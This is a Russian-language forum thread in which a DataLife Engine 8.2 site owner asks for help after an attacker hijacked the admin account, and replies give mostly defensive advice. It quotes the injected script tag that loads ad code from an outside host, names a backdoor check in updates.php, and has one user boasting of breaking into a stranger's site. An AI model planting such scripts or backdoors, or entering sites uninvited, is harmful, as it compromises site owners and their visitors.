Нужна помощь ломают сайт

В общем проблемка такая. Недавно захожу на свой сайт и на своё удивление вижу что от куда то появилась рекламма кликандера. Попытался воити под админским аккаунтом, но так и не смог кто то сменил пароль, вобщем я воспользовался восстановлением пароля на e-mail зашёл в админку и нашёл в шаблоне такой код:

Code:

<script language='javascript' type='text/javascript' src='http://softxx.ru/m'></script>

посмотрел с какого IP последний раз заходили в админку 81.222.236.109
Информация об ip-адресе 81.222.236.109

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '81.222.236.0 - 81.222.236.255'

inetnum: 81.222.236.0 - 81.222.236.255
netname: TimeWeb
descr: Hosting Service Provider
country: RU
admin-c: AAB74-RIPE
tech-c: AAB74-RIPE
status: ASSIGNED PA
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered

person: Alexandr A Boykov
address: 13, Sedova st.
address: 192148, Saint-Petersburg
address: Russia
phone: +7 812 3341520
fax-no: +7 812 3341530
abuse-mailbox: [email protected]
nic-hdl: AAB74-RIPE
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered

% Information related to '81.222.192.0/18AS20597'

route: 81.222.192.0/18
descr: ELTEL.net
origin: AS20597
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered

Как я понял что кто то c VDS на TimeWebe ломает
Пробовал переименовать файл admin.php, но к сожалению не помогло сейчас снова ломанули
хочу сейчас права на запись main.tpl убрать незнаю поможет или нет
Подскажите что можно поделать сайт стоит на DLE

 

обновить версию дле

 

Попробуй DLE обновить и попроси кого-нибудь из прошареных знакомых сайт на уязвимости проверить, может найдете дырку, через которую зараза лезет.

 

смотри логи, мож найдеш чего интересного

 

версия DLE 8.2
дело в том что у меня есть ещё пару сайтов на dle они на более старых версиях, но там всё нормально никто не ломает
кстати сейчас погуглил нашёл http://devilstar.habrahabr.ru/blog/76359/ видимо не только у меня такая проблемка

 

http://drtro.name/249-dle-8-2-nedostatochnye-filtraciya-v-praktike/
обнови свой дле

 

Точно такая проблема была сайт ломали по 3-4 раза на день! Поставил 8.3 всё нормально!

 

http://forum.antichat.ru/showpost.php?p=1683160&postcount=83

хм

 

средствами сервера поставь пароль на папку с админкой, с самим файлом .htaccess гемороится не советую, если есть директ админ - там это сделать очень просто.

 

В DLE 8.2 в одном из компонентов движка шелл.
Настоятельно рекомендую проверить файлик, лежащий по адресу - engine/ajax/updates.php
Ищем там такую шнягу - if($_GET['wert']=='')
Измени/обнови файл.
В следующий раз качай нуллы из достоверных источников.

 

версия 8.2 сильно уязвима.
Давно надо было обновить двиг. Я когда то так по гуглил сайты с 8.2 и попался мне сайт хотснига... попал в админку. че тон е стал атм ничего токого делать и написал админу в аську чтобы обновил двиг ^^

 

ТС несколько ЭЛЕМЕНТАРНЫХ советов по обеспечению безопасности Вашего портала:
1 Качайте ВСЕ дополнения, обновления, и базовые версии скриптов ТОЛЬКО С ОФФ САЙТА РАЗРАБОТЧИКОВ
2 Внимательно следи за обновлениями и новостями офф сайта, т.к если и найдуться какие то ошибки в коде которые открывают уязвимости, то в первую очередь они опубликуються на офф сайте, а не где либо еще.
3 Не совершай быстрый переход по ссылкам которые тебе подсовывают незнакомые люди. думаю причину объяснять не нужно...
4 не пользуйся говнохостами, на моей практике до 70% взломов было через хостинг. Лично я уделяю огромное внимание выбору хостинга.

 

5. Нанять специалиста который вычистит все шеллы и бекдоры и забыть все, что написано выше

 

это дорогое удовольствие)) не у всех есть возможность платить за работу подобного рода. + надо самому учиться... и все подобные траблы можно было бы предотвратить, если бы ТС больше юзал офф сайт

 

Вычистить шшелы и бэкдры )))) 1мб кодв 20к итого ДЛЕ весит около 4мб - соответсвенно проверить на шшелы будит стоить 80 т.р ))) да нахер оно надо ))) лучше лицуху взять ))

 

Здрасти всем...
тут такой вопрос созрел, у друга ломают сайт на mobileCMS... я (как начинающий кодер на php) помогал ему с сайтом и закрывал дыры, которые находил... но это так сказать любительский уровень... подскажите, как на готовом сайте, залитом на хост, можно найти дыры, баги, шеллы и бекдоры? мне бы теорию с азов почитать, но вот найти не могу... если где-то на античате есть ответ, дайте ссыль, пожалуйста ...

спасибо...